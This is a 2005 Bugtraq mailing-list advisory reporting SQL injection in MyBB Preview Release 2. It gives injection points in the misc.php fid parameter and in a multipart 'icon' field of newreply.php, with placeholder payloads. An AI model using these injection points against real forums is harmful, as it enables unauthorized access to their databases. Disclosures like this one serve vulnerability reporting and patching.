[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    SQL Injection[2] In MyBB PR2
From:       stranger-killer () hotmail ! com
Date:       2005-09-07 10:32:05
Message-ID: 20050907103205.21148.qmail () securityfocus ! com
[Download RAW message or body]

Hello ..

The Injected File : misc.php , newreply.php
Discovered by: Devil-00

Injected Versions :-
MyBB Preview Release 2

misc.php :-
[CODE]
http://site/misc.php?action=rules&fid=-1' [SQL]
[/CODE]

newreply.php :-
[CODE]
Do Preview By FireFox And Edit Header ;)

Content-Disposition: form-data; name="icon"\r\n
\r\n
-1') [SQL] /*\r\n
[/CODE]

GreeTz For Security4Arab Team And HACKERS PAL And ABDUCTER
[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic